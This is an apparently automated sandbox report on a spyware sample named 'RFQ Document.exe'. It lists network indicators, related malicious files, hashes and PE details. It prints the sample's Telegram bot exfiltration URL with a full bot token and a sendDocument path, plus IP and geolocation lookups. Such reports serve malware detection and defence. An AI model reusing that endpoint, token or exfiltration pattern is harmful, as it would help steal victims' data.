                                http://nsis.sf.net/NSIS_ErrorErrorRFQ Document.exefalse
                                  		high
                                  https://api.telegram.orgD81l$TRFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  https://api.telegram.orgD81llRFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.telegram.orgD81lT~RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  https://api.telegram.orgD81l4RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.telegram.orgD81ltRFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://nsis.sf.net/NSIS_ErrorRFQ Document.exefalse
                                    		high
                                    https://api.telegram.orgD81ldbRFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.telegram.orgD81l(RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    https://api.telegram.orgD81lLHRFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://checkip.dyndns.org/qRFQ Document.exe, 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, RFQ Document.exe, 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://api.telegramRFQ Document.exe, 00000002.00000003.861059471.0000000002A86000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://freegeoip.app41lRFQ Document.exe, 00000002.00000002.926634482.00000000024A7000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.telegram.orgD81lRFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.telegram.orgD81lLRFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ Document.exe, 00000002.00000002.926600469.0000000002461000.00000004.00000001.sdmpfalse
                                        		high
                                        https://api.telegram.orgD81lDPRFQ Document.exe, 00000002.00000002.929106581.0000000005EFE000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.telegram.org/bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp, RFQ Document.exe, 00000002.00000003.861005087.0000000002A7A000.00000004.00000001.sdmpfalse
                                          		high
                                          https://api.telegram.orgD81lTRFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                                            		unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            132.226.8.169
                                            		checkip.dyndns.comUnited States
                                            		16989UTMEMUSfalse
                                            149.154.167.220
                                            		api.telegram.orgUnited Kingdom
                                            		62041TELEGRAMRUfalse
                                            172.67.188.154
                                            		freegeoip.appUnited States
                                            		13335CLOUDFLARENETUSfalse

                                            General Information

                                            Joe Sandbox Version:33.0.0 White Diamond
                                            Analysis ID:491944
                                            Start date:28.09.2021
                                            Start time:07:57:01
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 23s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:RFQ Document.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:18
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@3/2@5/3
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 23.7% (good quality ratio 15.3%)
                                            • Quality average: 54.2%
                                            • Quality standard deviation: 43.8%
                                            HCA Information:
                                            • Successful, ratio: 82%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                            • TCP Packets have been reduced to 100
                                            • Excluded IPs from analysis (whitelisted): 23.203.80.193, 13.107.246.254, 96.16.150.73, 13.107.3.254, 52.113.196.254, 20.82.210.154, 23.211.6.115, 173.222.108.210, 173.222.108.226, 20.54.110.249, 40.112.88.60, 20.82.209.183, 80.67.82.235, 80.67.82.211
                                            • Excluded domains from analysis (whitelisted): s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, e13551.dscg.akamaiedge.net, msagfx.live.com-6.edgekey.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, authgfx.msa.akadns6.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, t-ring.msedge.net, s-ring.s-9999.s-msedge.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, s-9999.s-msedge.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, teams-ring.teams-9999.teams-msedge.net, t-ring.t-9999.t-msedge.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/491944/sample/RFQ Document.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            07:58:09API Interceptor2x Sleep call for process: RFQ Document.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            132.226.8.169FACTURA POR DOCUMENTO_PDF_.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            #Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            Pendants.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            DHL Awb_ Docs 5544834610_pdf.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            NS. ORDINE N. 141.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            Yeni sipari#U015f _WJO-001, pdf.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            quotation.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            jxTv73rSIY.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            IMPORTS INVOICE.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            PO No. SMC -458964-005.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            Quotation -Scan001_No- 9300340731.doc.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            product portolio.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            r1DQMRFhNghY3LC.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            eFatura KontrolEXD2021000000173.pdf.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            RFQ NO 97121533- UNPLANED PR OGI 3214 - VALVES(FP 4333-17) pdf.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            Drawing and Specification.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            1tkcPigLWj.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            SCANNED DOCUMENT 00001.rtfGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            order_list.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/
                                            new order.exeGet hashmaliciousBrowse
                                            • checkip.dyndns.org/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            api.telegram.orgTT09876545678T8R456.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            01_extracted.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            Order_0178PDF.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            ZNoKWifQwj.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            DHL Air Waybill NO_10019272778.pdf.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            MfHRwz3hGD.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            2acrvok36Y.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            Atlasship_O2ASV706248.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            TT09876545678T8R456.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            TT3456522345.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            kundeserv.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            dhl.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            6MC579H2Rk.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            temp order.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            PO.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.2591.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.W32.AIDetect.malware1.22628.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            bGnjv3RdRI.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            hSqkX3ZIw4.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            pF4vlHFijX.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            freegeoip.appFACTURA POR DOCUMENTO_PDF_.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            hqMneZDbE6m33i1.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            o6U6dMCbP3.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            Invoice M470031261, M470031262, M470031263.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            Payment Confirmation TT reference po.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            GU#U00cdA DE CARGA...exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            TT09876545678T8R456.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            01_extracted.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            SOA.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            S.O.A.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            #U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            DHL NOTIFICATIONS.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            DHL NOTIFICATION.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            #Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            2acrvok36Y.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            Exodus.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            Pendants.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            09876567824567890987654.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            DHL Awb_ Docs 5544834610_pdf.exeGet hashmaliciousBrowse
                                            • 172.67.188.154

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            TELEGRAMRUCPHB7Z2buG.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            aylGgMNibQ.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            V3fm0d84mp.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            Aqlmlmmeey.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            6lGJNtdKHt.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            nGiDZ9ZC2d.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            xx2wsaL3cJ.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            75fcGkVO1k.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            8aAG42oIjb.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            Zq0u07ZGkg.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            jUV82t8dgh.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            SecuriteInfo.com.W32.AIDetect.malware1.14529.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            31cGYywxgy.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            pAWNholT8X.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            TT09876545678T8R456.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            OARirszNK2.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            rbQe356Ces.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            01_extracted.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            kzSWxYLY4H.exeGet hashmaliciousBrowse
                                            • 149.154.167.99
                                            Order_0178PDF.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            UTMEMUSFACTURA POR DOCUMENTO_PDF_.exeGet hashmaliciousBrowse
                                            • 132.226.8.169
                                            o6U6dMCbP3.exeGet hashmaliciousBrowse
                                            • 132.226.247.73
                                            TT09876545678T8R456.exeGet hashmaliciousBrowse
                                            • 132.226.247.73
                                            LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exeGet hashmaliciousBrowse
                                            • 132.226.247.73
                                            #Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exeGet hashmaliciousBrowse
                                            • 132.226.8.169
                                            Pendants.exeGet hashmaliciousBrowse
                                            • 132.226.8.169
                                            IH8yGKHMaAGet hashmaliciousBrowse
                                            • 132.226.89.226
                                            DHL Awb_ Docs 5544834610_pdf.exeGet hashmaliciousBrowse
                                            • 132.226.8.169
                                            NS. ORDINE N. 141.exeGet hashmaliciousBrowse
                                            • 132.226.8.169
                                            KLC45E_92421_PI.exeGet hashmaliciousBrowse
                                            • 132.226.247.73
                                            Yeni sipari#U015f _WJO-001, pdf.exeGet hashmaliciousBrowse
                                            • 132.226.8.169
                                            3456787654567.exeGet hashmaliciousBrowse
                                            • 132.226.247.73
                                            quotation.exeGet hashmaliciousBrowse
                                            • 132.226.8.169
                                            Inquiry.exeGet hashmaliciousBrowse
                                            • 132.226.247.73
                                            24678987650976500654.exeGet hashmaliciousBrowse
                                            • 132.226.247.73
                                            REMITTANCE-54324.exeGet hashmaliciousBrowse
                                            • 132.226.247.73
                                            jxTv73rSIY.exeGet hashmaliciousBrowse
                                            • 132.226.8.169
                                            Order 20200822......PDF.exeGet hashmaliciousBrowse
                                            • 132.226.247.73
                                            IMPORTS INVOICE.exeGet hashmaliciousBrowse
                                            • 132.226.8.169
                                            PO No. SMC -458964-005.exeGet hashmaliciousBrowse
                                            • 132.226.8.169

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            54328bd36c14bd82ddaa0c04b25ed9adREQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            FACTURA POR DOCUMENTO_PDF_.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            hqMneZDbE6m33i1.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            o6U6dMCbP3.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            Invoice M470031261, M470031262, M470031263.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            Payment Confirmation TT reference po.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            DHL AWB# 4AB19037XXX.pdf.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            aQKifdER74.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            s9SWgUgyO5.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            GU#U00cdA DE CARGA...exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            q2D8haqKv5.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            TT09876545678T8R456.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            Original Shipping documents.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            TAX INVOICE_CCU-30408495_00942998_20180910_194738.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            RHgAncmh0E.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            01_extracted.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            INQUIRY LIST.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            YTHK21082400.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            Taskmgr.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            SOA.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            3b5074b1b5d032e5620f69f9f700ff0eLoTvACZ5sr.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            Orient-Q21-0919.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            xWKIUfcQRv.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            TT09876545678T8R456.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            01_extracted.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            VESSEL SEPC'S - WECO BULK.doc.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            Order_0178PDF.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            2021092600983746_pdf.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            Ov3tXE6rdw.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            dL7mvARUBj.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            qfgYtXS4Az.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            2B97860AFD98DFF5BED238E2A2CE25977B50BA5356333.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.Variant.Razy.934040.7155.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            J1IYv644YS.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            SdNKkoXklZ.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            2acrvok36Y.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            DiscordDeveloperUpdate.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            Exodus.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            Ze7iQlRsAk.exeGet hashmaliciousBrowse
                                            • 149.154.167.220
                                            fufx4OeSfW.exeGet hashmaliciousBrowse
                                            • 149.154.167.220

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dll
                                            Process:C:\Users\user\Desktop\RFQ Document.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):48640
                                            Entropy (8bit):6.2182104873428505
                                            Encrypted:false
                                            SSDEEP:768:4ioGJiW4t1H+5f7isHkd6xEiqymUEKRnJyQuhIaySqnN6ICFunphQF2H2jIRo1ik:qGJiW47s9zHkunphQF3ZHVuIXxy5iqdY
                                            MD5:A4B645ED197074158D7159BD47FA101B
                                            SHA1:E50E421AFBA9603D2E57137FF72ACA6256C14CF1
                                            SHA-256:15AEF55D8E9F0D4AD435E111DC346FDEB294A77EA06B8B053424B11C3CD6FBCD
                                            SHA-512:3CC5E9FD59DFD4E40F691D3DE9F5B9C809F5C4A3643D03606133CC608619923F96E4058598572BC716BFAE70173C50AFDD74C32A1D258AB036F3DA847EB86155
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:low
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.3...`...`...`.o.a...`.o.a...`...`...`vS.a...`vS.a...`sS6`...`vS.a...`Rich...`........PE..L...."Ra...........!.....j...P............................................................@.........................0...H...t........................................................................................................................text....h.......j.................. ..`.bss.....................................rdata..,............n..............@..@.data....5.......6...~..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\trhfchm3wzuw7
                                            Process:C:\Users\user\Desktop\RFQ Document.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):290815
                                            Entropy (8bit):7.9769874200086415
                                            Encrypted:false
                                            SSDEEP:6144:20av42lNrOZIL8wg3SbnMuuW/AZwHhFmxLU:20olpk3SXuWEwHhFkLU
                                            MD5:E91C3056A10910CB57D0F7FED6E8ED81
                                            SHA1:DE7514EBDA3F6754CDD5E4F27772DA0CD46D0CB9
                                            SHA-256:2180416E95180B0F3BC245FF4660ED8B6F6C3AD6014053C043C3EE487DD3BE41
                                            SHA-512:BD34E93EC9AAA59E434E9F38EEC253DAABD4F2FB2A3927E5ECCC5D147946C0238578C902A3E60388F46091C83024BB8EE0A4A8DCBAF8719899043AECECBAF6B6
                                            Malicious:false
                                            Reputation:low
                                            Preview: %U.%...{......_.y.......p"....S-....nP'.J.d.....!...R%.'.^=V...*..z.C...\9.N.:..E..{@).[.8...j.....GS.(..l...&..$...!:w.?Z.m.r.........A.7A...GdQ......'rl......q...g.y..5.-.|l.../.N..R."..k....C%j.~..:0!....i..>......Q........b;.v9.....Z..i.....u%Q..{R.X.0.......Lp"...4.W.!..P'...d....p....NR%...^7jO...2.z.yd.aC3...)x.W....^.r.....a..,.o..ad........]..!>w.?b..D.4U...H....#.......... ..._..........Y.~.y/..wZ.B.#<O.>.@[e3...P.Q..X...7.u..+81p..Z......$.....Gs..q5....)...'3.Z..i....<`3...{....i._.....R..Lp"....S-...4nP.`.v#...b....bR%.e.^7....<2.z.yd..Ka.3..<0./=...,].r......a*.:.o..adj......>]+....=@.?...D.....H$V.#.;..t=........-.Z....{&.Y...y...w2a#.#<O.>.@[e3..UP....X...7..R+.1p..Z......$...U.Gs..q5....)...'3.Z..i.....u%Q..{....i._.......Lp"....S-....nP'.J.d.....!...R%.'.^7j...<2.z.yd..KaC3...)..W....D.r.D....a*.,.o..adj.......>]..!:w.?b..D.4U...H$...#.;..t=.... ..._..........Y.~.y..w2.B.#<O.>.@[e3...P.Q..X...7..R+.1p..Z......$...U.Gs

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.851156739985387
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:RFQ Document.exe
                                            File size:344837
                                            MD5:64468b2ab541687572ce6b435b41f2bd
                                            SHA1:893ae234d351c762ab388a7337c625e4b213da6e
                                            SHA256:d3ac98cf64ca2fca455b2e4f002c3381bcee699cf64bbfaa076222209f834b1a
                                            SHA512:317c14df6c6d1dd3b120a28743eface80474d7140515d61d0a00c326a923f56c71d7135907e2c2d5f17cba1b5746bb19ae5262cf656a098ebd94adba82cc2db8
                                            SSDEEP:6144:P8LxBkKFd08vwYfiEqj9LEW4AKkYMFO1UT489rSAZwghFmxGmf7qvce:BKFdLi1j9LEYKkNO1648JDwghFkFkce
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

                                            File Icon

                                            Icon Hash:2f9e2e2c030b2e87

                                            Static PE Info

                                            General

                                            Entrypoint:0x40312a
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:b76363e9cb88bf9390860da8e50999d2

                                            Entrypoint Preview

                                            Instruction
                                            sub esp, 00000184h
                                            push ebx
                                            push ebp
                                            push esi
                                            push edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [esp+20h], ebx
                                            mov dword ptr [esp+14h], 00409168h
                                            mov dword ptr [esp+1Ch], ebx
                                            mov byte ptr [esp+18h], 00000020h
                                            call dword ptr [004070B0h]
                                            call dword ptr [004070ACh]
                                            cmp ax, 00000006h
                                            je 00007F3BE0B3B823h
                                            push ebx
                                            call 00007F3BE0B3E604h
                                            cmp eax, ebx
                                            je 00007F3BE0B3B819h
                                            push 00000C00h
                                            call eax
                                            mov esi, 00407280h
                                            push esi
                                            call 00007F3BE0B3E580h
                                            push esi
                                            call dword ptr [00407108h]
                                            lea esi, dword ptr [esi+eax+01h]
                                            cmp byte ptr [esi], bl
                                            jne 00007F3BE0B3B7FDh
                                            push 0000000Dh
                                            call 00007F3BE0B3E5D8h
                                            push 0000000Bh
                                            call 00007F3BE0B3E5D1h
                                            mov dword ptr [0042EC24h], eax
                                            call dword ptr [00407038h]
                                            push ebx
                                            call dword ptr [0040726Ch]
                                            mov dword ptr [0042ECD8h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+38h]
                                            push 00000160h
                                            push eax
                                            push ebx
                                            push 00429058h
                                            call dword ptr [0040715Ch]
                                            push 0040915Ch
                                            push 0042E420h
                                            call 00007F3BE0B3E204h
                                            call dword ptr [0040710Ch]
                                            mov ebp, 00434000h
                                            push eax
                                            push ebp
                                            call 00007F3BE0B3E1F2h
                                            push ebx
                                            call dword ptr [00407144h]

                                            Rich Headers

                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x75240xa0.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x4228.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x5e660x6000False0.670572916667data6.44065573436IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
